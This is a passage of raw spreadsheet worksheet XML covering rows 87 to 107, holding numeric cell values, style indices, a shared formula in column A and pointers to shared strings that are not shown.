      <c r="E87" s="8"/>
      <c r="F87" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G87" s="8"/>
      <c r="H87" s="6">
        <v>0.0</v>
      </c>
      <c r="I87" s="6">
        <v>16.0</v>
      </c>
      <c r="J87" s="17"/>
      <c r="K87" s="17"/>
      <c r="L87" s="17"/>
      <c r="M87" s="17"/>
      <c r="N87" s="17"/>
      <c r="O87" s="4" t="s">
        <v>348</v>
      </c>
      <c r="P87" s="4" t="s">
        <v>349</v>
      </c>
      <c r="Q87" s="6">
        <v>1.4377206E7</v>
      </c>
      <c r="R87" s="7"/>
      <c r="S87" s="7"/>
      <c r="T87" s="7"/>
      <c r="U87" s="8"/>
      <c r="V87" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W87" s="2" t="s">
        <v>350</v>
      </c>
      <c r="X87" s="6">
        <v>0.0</v>
      </c>
      <c r="Y87" s="6">
        <v>0.0</v>
      </c>
      <c r="Z87" s="7"/>
      <c r="AA87" s="7"/>
      <c r="AB87" s="7"/>
      <c r="AC87" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE87" s="8"/>
      <c r="AF87" s="15"/>
    </row>
    <row r="88">
      <c r="A88" s="6">
        <f t="shared" si="1"/>
        <v>0.8333293868</v>
      </c>
      <c r="B88" s="6">
        <v>1.6423441E7</v>
      </c>
      <c r="C88" s="6">
        <v>1.0</v>
      </c>
      <c r="D88" s="7"/>
      <c r="E88" s="8"/>
      <c r="F88" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G88" s="8"/>
      <c r="H88" s="6">
        <v>0.0</v>
      </c>
      <c r="I88" s="6">
        <v>915.0</v>
      </c>
      <c r="J88" s="17"/>
      <c r="K88" s="17"/>
      <c r="L88" s="17"/>
      <c r="M88" s="17"/>
      <c r="N88" s="17"/>
      <c r="O88" s="4" t="s">
        <v>351</v>
      </c>
      <c r="P88" s="4" t="s">
        <v>352</v>
      </c>
      <c r="Q88" s="6">
        <v>2355861.0</v>
      </c>
      <c r="R88" s="7"/>
      <c r="S88" s="7"/>
      <c r="T88" s="7"/>
      <c r="U88" s="8"/>
      <c r="V88" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W88" s="2" t="s">
        <v>353</v>
      </c>
      <c r="X88" s="6">
        <v>2.0</v>
      </c>
      <c r="Y88" s="6">
        <v>9.0</v>
      </c>
      <c r="Z88" s="7"/>
      <c r="AA88" s="7"/>
      <c r="AB88" s="7"/>
      <c r="AC88" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE88" s="8"/>
      <c r="AF88" s="15"/>
    </row>
    <row r="89">
      <c r="A89" s="6">
        <f t="shared" si="1"/>
        <v>0.6983378894</v>
      </c>
      <c r="B89" s="6">
        <v>6.5928694E7</v>
      </c>
      <c r="C89" s="6">
        <v>1.0</v>
      </c>
      <c r="D89" s="7"/>
      <c r="E89" s="8"/>
      <c r="F89" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G89" s="8"/>
      <c r="H89" s="6">
        <v>0.0</v>
      </c>
      <c r="I89" s="6">
        <v>140.0</v>
      </c>
      <c r="J89" s="17"/>
      <c r="K89" s="17"/>
      <c r="L89" s="17"/>
      <c r="M89" s="17"/>
      <c r="N89" s="17"/>
      <c r="O89" s="4" t="s">
        <v>354</v>
      </c>
      <c r="P89" s="4" t="s">
        <v>355</v>
      </c>
      <c r="Q89" s="6">
        <v>1.5095028E7</v>
      </c>
      <c r="R89" s="7"/>
      <c r="S89" s="7"/>
      <c r="T89" s="7"/>
      <c r="U89" s="7"/>
      <c r="V89" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W89" s="2" t="s">
        <v>356</v>
      </c>
      <c r="X89" s="6">
        <v>1.0</v>
      </c>
      <c r="Y89" s="6">
        <v>2.0</v>
      </c>
      <c r="Z89" s="7"/>
      <c r="AA89" s="7"/>
      <c r="AB89" s="7"/>
      <c r="AC89" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE89" s="7"/>
      <c r="AF89" s="15"/>
    </row>
    <row r="90">
      <c r="A90" s="6">
        <f t="shared" si="1"/>
        <v>0.6196564904</v>
      </c>
      <c r="B90" s="6">
        <v>2.0577404E7</v>
      </c>
      <c r="C90" s="6">
        <v>1.0</v>
      </c>
      <c r="D90" s="6">
        <v>2.0577425E7</v>
      </c>
      <c r="E90" s="8"/>
      <c r="F90" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G90" s="8"/>
      <c r="H90" s="6">
        <v>-1.0</v>
      </c>
      <c r="I90" s="6">
        <v>185.0</v>
      </c>
      <c r="J90" s="17"/>
      <c r="K90" s="17"/>
      <c r="L90" s="17"/>
      <c r="M90" s="17"/>
      <c r="N90" s="17"/>
      <c r="O90" s="4" t="s">
        <v>357</v>
      </c>
      <c r="P90" s="4" t="s">
        <v>358</v>
      </c>
      <c r="Q90" s="6">
        <v>235415.0</v>
      </c>
      <c r="R90" s="7"/>
      <c r="S90" s="7"/>
      <c r="T90" s="7"/>
      <c r="U90" s="8"/>
      <c r="V90" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W90" s="2" t="s">
        <v>359</v>
      </c>
      <c r="X90" s="6">
        <v>1.0</v>
      </c>
      <c r="Y90" s="6">
        <v>2.0</v>
      </c>
      <c r="Z90" s="6">
        <v>0.0</v>
      </c>
      <c r="AA90" s="7"/>
      <c r="AB90" s="7"/>
      <c r="AC90" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE90" s="8"/>
      <c r="AF90" s="15"/>
    </row>
    <row r="91">
      <c r="A91" s="6">
        <f t="shared" si="1"/>
        <v>0.8427933345</v>
      </c>
      <c r="B91" s="6">
        <v>5.766834E7</v>
      </c>
      <c r="C91" s="6">
        <v>1.0</v>
      </c>
      <c r="D91" s="8"/>
      <c r="E91" s="8"/>
      <c r="F91" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G91" s="8"/>
      <c r="H91" s="6">
        <v>0.0</v>
      </c>
      <c r="I91" s="6">
        <v>109.0</v>
      </c>
      <c r="J91" s="17"/>
      <c r="K91" s="17"/>
      <c r="L91" s="17"/>
      <c r="M91" s="17"/>
      <c r="N91" s="17"/>
      <c r="O91" s="4" t="s">
        <v>360</v>
      </c>
      <c r="P91" s="4" t="s">
        <v>361</v>
      </c>
      <c r="Q91" s="6">
        <v>1395544.0</v>
      </c>
      <c r="R91" s="7"/>
      <c r="S91" s="7"/>
      <c r="T91" s="7"/>
      <c r="U91" s="8"/>
      <c r="V91" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W91" s="2" t="s">
        <v>362</v>
      </c>
      <c r="X91" s="6">
        <v>1.0</v>
      </c>
      <c r="Y91" s="6">
        <v>0.0</v>
      </c>
      <c r="Z91" s="7"/>
      <c r="AA91" s="7"/>
      <c r="AB91" s="7"/>
      <c r="AC91" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE91" s="8"/>
      <c r="AF91" s="15"/>
    </row>
    <row r="92">
      <c r="A92" s="6">
        <f t="shared" si="1"/>
        <v>0.07523012549</v>
      </c>
      <c r="B92" s="6">
        <v>4.0426802E7</v>
      </c>
      <c r="C92" s="6">
        <v>1.0</v>
      </c>
      <c r="D92" s="6">
        <v>5.3840429E7</v>
      </c>
      <c r="E92" s="8"/>
      <c r="F92" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G92" s="8"/>
      <c r="H92" s="6">
        <v>3.0</v>
      </c>
      <c r="I92" s="6">
        <v>8466.0</v>
      </c>
      <c r="J92" s="20"/>
      <c r="K92" s="20"/>
      <c r="L92" s="20"/>
      <c r="M92" s="20"/>
      <c r="N92" s="20"/>
      <c r="O92" s="4" t="s">
        <v>363</v>
      </c>
      <c r="P92" s="4" t="s">
        <v>364</v>
      </c>
      <c r="Q92" s="6">
        <v>340688.0</v>
      </c>
      <c r="R92" s="8"/>
      <c r="S92" s="8"/>
      <c r="T92" s="8"/>
      <c r="U92" s="8"/>
      <c r="V92" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W92" s="2" t="s">
        <v>365</v>
      </c>
      <c r="X92" s="6">
        <v>1.0</v>
      </c>
      <c r="Y92" s="6">
        <v>5.0</v>
      </c>
      <c r="Z92" s="8"/>
      <c r="AA92" s="8"/>
      <c r="AB92" s="8"/>
      <c r="AC92" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE92" s="8"/>
      <c r="AF92" s="14"/>
    </row>
    <row r="93">
      <c r="A93" s="6">
        <f t="shared" si="1"/>
        <v>0.9664743602</v>
      </c>
      <c r="B93" s="6">
        <v>7.0170474E7</v>
      </c>
      <c r="C93" s="6">
        <v>1.0</v>
      </c>
      <c r="D93" s="8"/>
      <c r="E93" s="8"/>
      <c r="F93" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G93" s="8"/>
      <c r="H93" s="6">
        <v>0.0</v>
      </c>
      <c r="I93" s="6">
        <v>160.0</v>
      </c>
      <c r="J93" s="17"/>
      <c r="K93" s="17"/>
      <c r="L93" s="17"/>
      <c r="M93" s="17"/>
      <c r="N93" s="17"/>
      <c r="O93" s="4" t="s">
        <v>366</v>
      </c>
      <c r="P93" s="4" t="s">
        <v>367</v>
      </c>
      <c r="Q93" s="6">
        <v>1.1990159E7</v>
      </c>
      <c r="R93" s="7"/>
      <c r="S93" s="7"/>
      <c r="T93" s="7"/>
      <c r="U93" s="8"/>
      <c r="V93" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W93" s="2" t="s">
        <v>368</v>
      </c>
      <c r="X93" s="6">
        <v>1.0</v>
      </c>
      <c r="Y93" s="6">
        <v>0.0</v>
      </c>
      <c r="Z93" s="7"/>
      <c r="AA93" s="7"/>
      <c r="AB93" s="7"/>
      <c r="AC93" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE93" s="8"/>
      <c r="AF93" s="15"/>
    </row>
    <row r="94">
      <c r="A94" s="6">
        <f t="shared" si="1"/>
        <v>0.3356053282</v>
      </c>
      <c r="B94" s="6">
        <v>6.7679187E7</v>
      </c>
      <c r="C94" s="6">
        <v>1.0</v>
      </c>
      <c r="D94" s="8"/>
      <c r="E94" s="8"/>
      <c r="F94" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G94" s="8"/>
      <c r="H94" s="6">
        <v>2.0</v>
      </c>
      <c r="I94" s="6">
        <v>282.0</v>
      </c>
      <c r="J94" s="20"/>
      <c r="K94" s="20"/>
      <c r="L94" s="20"/>
      <c r="M94" s="20"/>
      <c r="N94" s="20"/>
      <c r="O94" s="4" t="s">
        <v>369</v>
      </c>
      <c r="P94" s="4" t="s">
        <v>370</v>
      </c>
      <c r="Q94" s="6">
        <v>586609.0</v>
      </c>
      <c r="R94" s="8"/>
      <c r="S94" s="6">
        <v>586609.0</v>
      </c>
      <c r="T94" s="8"/>
      <c r="U94" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V94" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W94" s="2" t="s">
        <v>371</v>
      </c>
      <c r="X94" s="6">
        <v>0.0</v>
      </c>
      <c r="Y94" s="6">
        <v>1.0</v>
      </c>
      <c r="Z94" s="6">
        <v>0.0</v>
      </c>
      <c r="AA94" s="8"/>
      <c r="AB94" s="8"/>
      <c r="AC94" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE94" s="8"/>
      <c r="AF94" s="14"/>
    </row>
    <row r="95">
      <c r="A95" s="6">
        <f t="shared" si="1"/>
        <v>0.4278811718</v>
      </c>
      <c r="B95" s="6">
        <v>4.4663025E7</v>
      </c>
      <c r="C95" s="6">
        <v>1.0</v>
      </c>
      <c r="D95" s="8"/>
      <c r="E95" s="8"/>
      <c r="F95" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G95" s="8"/>
      <c r="H95" s="6">
        <v>0.0</v>
      </c>
      <c r="I95" s="6">
        <v>896.0</v>
      </c>
      <c r="J95" s="20"/>
      <c r="K95" s="20"/>
      <c r="L95" s="20"/>
      <c r="M95" s="20"/>
      <c r="N95" s="20"/>
      <c r="O95" s="4" t="s">
        <v>372</v>
      </c>
      <c r="P95" s="4" t="s">
        <v>373</v>
      </c>
      <c r="Q95" s="6">
        <v>1153476.0</v>
      </c>
      <c r="R95" s="8"/>
      <c r="S95" s="6">
        <v>2571021.0</v>
      </c>
      <c r="T95" s="8"/>
      <c r="U95" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V95" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W95" s="2" t="s">
        <v>374</v>
      </c>
      <c r="X95" s="6">
        <v>2.0</v>
      </c>
      <c r="Y95" s="6">
        <v>0.0</v>
      </c>
      <c r="Z95" s="6">
        <v>0.0</v>
      </c>
      <c r="AA95" s="8"/>
      <c r="AB95" s="8"/>
      <c r="AC95" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE95" s="8"/>
      <c r="AF95" s="14"/>
    </row>
    <row r="96">
      <c r="A96" s="6">
        <f t="shared" si="1"/>
        <v>0.01129151727</v>
      </c>
      <c r="B96" s="6">
        <v>3.922866E7</v>
      </c>
      <c r="C96" s="6">
        <v>1.0</v>
      </c>
      <c r="D96" s="6">
        <v>3.9229709E7</v>
      </c>
      <c r="E96" s="8"/>
      <c r="F96" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G96" s="8"/>
      <c r="H96" s="6">
        <v>0.0</v>
      </c>
      <c r="I96" s="6">
        <v>1881.0</v>
      </c>
      <c r="J96" s="17"/>
      <c r="K96" s="17"/>
      <c r="L96" s="17"/>
      <c r="M96" s="17"/>
      <c r="N96" s="17"/>
      <c r="O96" s="4" t="s">
        <v>375</v>
      </c>
      <c r="P96" s="4" t="s">
        <v>376</v>
      </c>
      <c r="Q96" s="6">
        <v>4346415.0</v>
      </c>
      <c r="R96" s="7"/>
      <c r="S96" s="6">
        <v>1238413.0</v>
      </c>
      <c r="T96" s="7"/>
      <c r="U96" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V96" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W96" s="2" t="s">
        <v>253</v>
      </c>
      <c r="X96" s="6">
        <v>1.0</v>
      </c>
      <c r="Y96" s="6">
        <v>0.0</v>
      </c>
      <c r="Z96" s="7"/>
      <c r="AA96" s="7"/>
      <c r="AB96" s="7"/>
      <c r="AC96" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE96" s="8"/>
      <c r="AF96" s="15"/>
    </row>
    <row r="97">
      <c r="A97" s="6">
        <f t="shared" si="1"/>
        <v>0.847273717</v>
      </c>
      <c r="B97" s="6">
        <v>7.619065E7</v>
      </c>
      <c r="C97" s="6">
        <v>1.0</v>
      </c>
      <c r="D97" s="8"/>
      <c r="E97" s="8"/>
      <c r="F97" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G97" s="8"/>
      <c r="H97" s="6">
        <v>0.0</v>
      </c>
      <c r="I97" s="6">
        <v>23.0</v>
      </c>
      <c r="J97" s="20"/>
      <c r="K97" s="20"/>
      <c r="L97" s="20"/>
      <c r="M97" s="20"/>
      <c r="N97" s="20"/>
      <c r="O97" s="4" t="s">
        <v>377</v>
      </c>
      <c r="P97" s="4" t="s">
        <v>378</v>
      </c>
      <c r="Q97" s="6">
        <v>1.9952121E7</v>
      </c>
      <c r="R97" s="8"/>
      <c r="S97" s="8"/>
      <c r="T97" s="8"/>
      <c r="U97" s="8"/>
      <c r="V97" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W97" s="2" t="s">
        <v>379</v>
      </c>
      <c r="X97" s="6">
        <v>0.0</v>
      </c>
      <c r="Y97" s="6">
        <v>3.0</v>
      </c>
      <c r="Z97" s="8"/>
      <c r="AA97" s="8"/>
      <c r="AB97" s="8"/>
      <c r="AC97" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE97" s="8"/>
      <c r="AF97" s="14"/>
    </row>
    <row r="98">
      <c r="A98" s="6">
        <f t="shared" si="1"/>
        <v>0.5985909214</v>
      </c>
      <c r="B98" s="6">
        <v>7.6532311E7</v>
      </c>
      <c r="C98" s="6">
        <v>1.0</v>
      </c>
      <c r="D98" s="6">
        <v>7.6533327E7</v>
      </c>
      <c r="E98" s="8"/>
      <c r="F98" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G98" s="8"/>
      <c r="H98" s="6">
        <v>1.0</v>
      </c>
      <c r="I98" s="6">
        <v>39.0</v>
      </c>
      <c r="J98" s="17"/>
      <c r="K98" s="17"/>
      <c r="L98" s="17"/>
      <c r="M98" s="17"/>
      <c r="N98" s="17"/>
      <c r="O98" s="4" t="s">
        <v>380</v>
      </c>
      <c r="P98" s="4" t="s">
        <v>381</v>
      </c>
      <c r="Q98" s="6">
        <v>4845950.0</v>
      </c>
      <c r="R98" s="7"/>
      <c r="S98" s="7"/>
      <c r="T98" s="7"/>
      <c r="U98" s="8"/>
      <c r="V98" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W98" s="2" t="s">
        <v>382</v>
      </c>
      <c r="X98" s="6">
        <v>1.0</v>
      </c>
      <c r="Y98" s="6">
        <v>0.0</v>
      </c>
      <c r="Z98" s="7"/>
      <c r="AA98" s="7"/>
      <c r="AB98" s="7"/>
      <c r="AC98" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE98" s="8"/>
      <c r="AF98" s="15"/>
    </row>
    <row r="99">
      <c r="A99" s="6">
        <f t="shared" si="1"/>
        <v>0.02790849568</v>
      </c>
      <c r="B99" s="6">
        <v>3.3209554E7</v>
      </c>
      <c r="C99" s="6">
        <v>1.0</v>
      </c>
      <c r="D99" s="6">
        <v>3.3209601E7</v>
      </c>
      <c r="E99" s="8"/>
      <c r="F99" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G99" s="8"/>
      <c r="H99" s="6">
        <v>5.0</v>
      </c>
      <c r="I99" s="6">
        <v>187.0</v>
      </c>
      <c r="J99" s="17"/>
      <c r="K99" s="17"/>
      <c r="L99" s="17"/>
      <c r="M99" s="17"/>
      <c r="N99" s="17"/>
      <c r="O99" s="4" t="s">
        <v>383</v>
      </c>
      <c r="P99" s="4" t="s">
        <v>384</v>
      </c>
      <c r="Q99" s="6">
        <v>3360096.0</v>
      </c>
      <c r="R99" s="7"/>
      <c r="S99" s="6">
        <v>3360096.0</v>
      </c>
      <c r="T99" s="7"/>
      <c r="U99" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V99" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W99" s="2" t="s">
        <v>385</v>
      </c>
      <c r="X99" s="6">
        <v>3.0</v>
      </c>
      <c r="Y99" s="6">
        <v>5.0</v>
      </c>
      <c r="Z99" s="7"/>
      <c r="AA99" s="7"/>
      <c r="AB99" s="7"/>
      <c r="AC99" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE99" s="8"/>
      <c r="AF99" s="15"/>
    </row>
    <row r="100">
      <c r="A100" s="6">
        <f t="shared" si="1"/>
        <v>0.4724900236</v>
      </c>
      <c r="B100" s="6">
        <v>4.0277386E7</v>
      </c>
      <c r="C100" s="6">
        <v>1.0</v>
      </c>
      <c r="D100" s="7"/>
      <c r="E100" s="8"/>
      <c r="F100" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G100" s="8"/>
      <c r="H100" s="6">
        <v>1.0</v>
      </c>
      <c r="I100" s="6">
        <v>2059.0</v>
      </c>
      <c r="J100" s="17"/>
      <c r="K100" s="17"/>
      <c r="L100" s="17"/>
      <c r="M100" s="17"/>
      <c r="N100" s="17"/>
      <c r="O100" s="4" t="s">
        <v>386</v>
      </c>
      <c r="P100" s="4" t="s">
        <v>387</v>
      </c>
      <c r="Q100" s="6">
        <v>4299316.0</v>
      </c>
      <c r="R100" s="7"/>
      <c r="S100" s="7"/>
      <c r="T100" s="7"/>
      <c r="U100" s="7"/>
      <c r="V100" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W100" s="2" t="s">
        <v>388</v>
      </c>
      <c r="X100" s="6">
        <v>1.0</v>
      </c>
      <c r="Y100" s="6">
        <v>3.0</v>
      </c>
      <c r="Z100" s="7"/>
      <c r="AA100" s="7"/>
      <c r="AB100" s="7"/>
      <c r="AC100" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE100" s="8"/>
      <c r="AF100" s="15"/>
    </row>
    <row r="101">
      <c r="A101" s="6">
        <f t="shared" si="1"/>
        <v>0.1428019791</v>
      </c>
      <c r="B101" s="6">
        <v>606411.0</v>
      </c>
      <c r="C101" s="6">
        <v>1.0</v>
      </c>
      <c r="D101" s="7"/>
      <c r="E101" s="8"/>
      <c r="F101" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G101" s="8"/>
      <c r="H101" s="6">
        <v>0.0</v>
      </c>
      <c r="I101" s="6">
        <v>749.0</v>
      </c>
      <c r="J101" s="17"/>
      <c r="K101" s="17"/>
      <c r="L101" s="17"/>
      <c r="M101" s="17"/>
      <c r="N101" s="17"/>
      <c r="O101" s="4" t="s">
        <v>389</v>
      </c>
      <c r="P101" s="4" t="s">
        <v>390</v>
      </c>
      <c r="Q101" s="6">
        <v>2133.0</v>
      </c>
      <c r="R101" s="2" t="s">
        <v>391</v>
      </c>
      <c r="S101" s="6">
        <v>139985.0</v>
      </c>
      <c r="T101" s="7"/>
      <c r="U101" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V101" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W101" s="2" t="s">
        <v>392</v>
      </c>
      <c r="X101" s="6">
        <v>2.0</v>
      </c>
      <c r="Y101" s="6">
        <v>0.0</v>
      </c>
      <c r="Z101" s="7"/>
      <c r="AA101" s="7"/>
      <c r="AB101" s="7"/>
      <c r="AC101" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE101" s="8"/>
      <c r="AF101" s="15"/>
    </row>
    <row r="102">
      <c r="A102" s="6">
        <f t="shared" si="1"/>
        <v>0.3512339226</v>
      </c>
      <c r="B102" s="6">
        <v>7.6499303E7</v>
      </c>
      <c r="C102" s="6">
        <v>1.0</v>
      </c>
      <c r="D102" s="7"/>
      <c r="E102" s="8"/>
      <c r="F102" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G102" s="8"/>
      <c r="H102" s="6">
        <v>-3.0</v>
      </c>
      <c r="I102" s="6">
        <v>26.0</v>
      </c>
      <c r="J102" s="17"/>
      <c r="K102" s="17"/>
      <c r="L102" s="17"/>
      <c r="M102" s="17"/>
      <c r="N102" s="17"/>
      <c r="O102" s="4" t="s">
        <v>393</v>
      </c>
      <c r="P102" s="4" t="s">
        <v>394</v>
      </c>
      <c r="Q102" s="6">
        <v>1.898494E7</v>
      </c>
      <c r="R102" s="7"/>
      <c r="S102" s="7"/>
      <c r="T102" s="7"/>
      <c r="U102" s="8"/>
      <c r="V102" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W102" s="2" t="s">
        <v>395</v>
      </c>
      <c r="X102" s="6">
        <v>0.0</v>
      </c>
      <c r="Y102" s="6">
        <v>0.0</v>
      </c>
      <c r="Z102" s="7"/>
      <c r="AA102" s="7"/>
      <c r="AB102" s="7"/>
      <c r="AC102" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE102" s="8"/>
      <c r="AF102" s="15"/>
    </row>
    <row r="103">
      <c r="A103" s="6">
        <f t="shared" si="1"/>
        <v>0.5499108473</v>
      </c>
      <c r="B103" s="6">
        <v>2.6324162E7</v>
      </c>
      <c r="C103" s="6">
        <v>1.0</v>
      </c>
      <c r="D103" s="6">
        <v>2.6325292E7</v>
      </c>
      <c r="E103" s="8"/>
      <c r="F103" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G103" s="8"/>
      <c r="H103" s="6">
        <v>-1.0</v>
      </c>
      <c r="I103" s="6">
        <v>102.0</v>
      </c>
      <c r="J103" s="17"/>
      <c r="K103" s="17"/>
      <c r="L103" s="17"/>
      <c r="M103" s="17"/>
      <c r="N103" s="17"/>
      <c r="O103" s="4" t="s">
        <v>396</v>
      </c>
      <c r="P103" s="4" t="s">
        <v>397</v>
      </c>
      <c r="Q103" s="6">
        <v>4134234.0</v>
      </c>
      <c r="R103" s="7"/>
      <c r="S103" s="6">
        <v>3074564.0</v>
      </c>
      <c r="T103" s="7"/>
      <c r="U103" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V103" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W103" s="2" t="s">
        <v>398</v>
      </c>
      <c r="X103" s="6">
        <v>1.0</v>
      </c>
      <c r="Y103" s="6">
        <v>1.0</v>
      </c>
      <c r="Z103" s="6">
        <v>0.0</v>
      </c>
      <c r="AA103" s="7"/>
      <c r="AB103" s="7"/>
      <c r="AC103" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE103" s="8"/>
      <c r="AF103" s="15"/>
    </row>
    <row r="104">
      <c r="A104" s="6">
        <f t="shared" si="1"/>
        <v>0.8357178714</v>
      </c>
      <c r="B104" s="6">
        <v>5.2409663E7</v>
      </c>
      <c r="C104" s="6">
        <v>1.0</v>
      </c>
      <c r="D104" s="8"/>
      <c r="E104" s="8"/>
      <c r="F104" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G104" s="8"/>
      <c r="H104" s="6">
        <v>2.0</v>
      </c>
      <c r="I104" s="6">
        <v>479.0</v>
      </c>
      <c r="J104" s="20"/>
      <c r="K104" s="20"/>
      <c r="L104" s="20"/>
      <c r="M104" s="20"/>
      <c r="N104" s="20"/>
      <c r="O104" s="4" t="s">
        <v>399</v>
      </c>
      <c r="P104" s="4" t="s">
        <v>400</v>
      </c>
      <c r="Q104" s="6">
        <v>1.0386467E7</v>
      </c>
      <c r="R104" s="8"/>
      <c r="S104" s="6">
        <v>1305969.0</v>
      </c>
      <c r="T104" s="8"/>
      <c r="U104" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V104" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W104" s="2" t="s">
        <v>401</v>
      </c>
      <c r="X104" s="6">
        <v>0.0</v>
      </c>
      <c r="Y104" s="6">
        <v>1.0</v>
      </c>
      <c r="Z104" s="8"/>
      <c r="AA104" s="8"/>
      <c r="AB104" s="8"/>
      <c r="AC104" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE104" s="8"/>
      <c r="AF104" s="14"/>
    </row>
    <row r="105">
      <c r="A105" s="6">
        <f t="shared" si="1"/>
        <v>0.08888838647</v>
      </c>
      <c r="B105" s="6">
        <v>3.5931479E7</v>
      </c>
      <c r="C105" s="6">
        <v>1.0</v>
      </c>
      <c r="D105" s="8"/>
      <c r="E105" s="8"/>
      <c r="F105" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G105" s="8"/>
      <c r="H105" s="6">
        <v>0.0</v>
      </c>
      <c r="I105" s="6">
        <v>88.0</v>
      </c>
      <c r="J105" s="20"/>
      <c r="K105" s="20"/>
      <c r="L105" s="20"/>
      <c r="M105" s="20"/>
      <c r="N105" s="20"/>
      <c r="O105" s="4" t="s">
        <v>402</v>
      </c>
      <c r="P105" s="4" t="s">
        <v>403</v>
      </c>
      <c r="Q105" s="6">
        <v>1152604.0</v>
      </c>
      <c r="R105" s="8"/>
      <c r="S105" s="8"/>
      <c r="T105" s="8"/>
      <c r="U105" s="8"/>
      <c r="V105" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W105" s="2" t="s">
        <v>404</v>
      </c>
      <c r="X105" s="6">
        <v>1.0</v>
      </c>
      <c r="Y105" s="6">
        <v>1.0</v>
      </c>
      <c r="Z105" s="8"/>
      <c r="AA105" s="8"/>
      <c r="AB105" s="8"/>
      <c r="AC105" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE105" s="8"/>
      <c r="AF105" s="14"/>
    </row>
    <row r="106">
      <c r="A106" s="6">
        <f t="shared" si="1"/>
        <v>0.1929351701</v>
      </c>
      <c r="B106" s="6">
        <v>5.5974214E7</v>
      </c>
      <c r="C106" s="6">
        <v>1.0</v>
      </c>
      <c r="D106" s="8"/>
      <c r="E106" s="8"/>
      <c r="F106" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G106" s="8"/>
      <c r="H106" s="6">
        <v>1.0</v>
      </c>
      <c r="I106" s="6">
        <v>66.0</v>
      </c>
      <c r="J106" s="20"/>
      <c r="K106" s="20"/>
      <c r="L106" s="20"/>
      <c r="M106" s="20"/>
      <c r="N106" s="20"/>
      <c r="O106" s="4" t="s">
        <v>405</v>
      </c>
      <c r="P106" s="4" t="s">
        <v>406</v>
      </c>
      <c r="Q106" s="6">
        <v>3862618.0</v>
      </c>
      <c r="R106" s="8"/>
      <c r="S106" s="6">
        <v>3862618.0</v>
      </c>
      <c r="T106" s="8"/>
      <c r="U106" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V106" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W106" s="2" t="s">
        <v>407</v>
      </c>
      <c r="X106" s="6">
        <v>0.0</v>
      </c>
      <c r="Y106" s="6">
        <v>8.0</v>
      </c>
      <c r="Z106" s="6">
        <v>0.0</v>
      </c>
      <c r="AA106" s="8"/>
      <c r="AB106" s="8"/>
      <c r="AC106" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE106" s="8"/>
      <c r="AF106" s="14"/>
    </row>
    <row r="107">
      <c r="A107" s="6">
        <f t="shared" si="1"/>
        <v>0.3821050632</v>
      </c>
      <c r="B107" s="6">
        <v>6.5488838E7</v>
      </c>
      <c r="C107" s="6">
        <v>1.0</v>
      </c>
      <c r="D107" s="8"/>
      <c r="E107" s="8"/>
      <c r="F107" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G107" s="8"/>
      <c r="H107" s="6">
        <v>0.0</v>
      </c>
      <c r="I107" s="6">
        <v>71.0</v>
      </c>
      <c r="J107" s="17"/>
      <c r="K107" s="17"/>
      <c r="L107" s="17"/>
      <c r="M107" s="17"/>
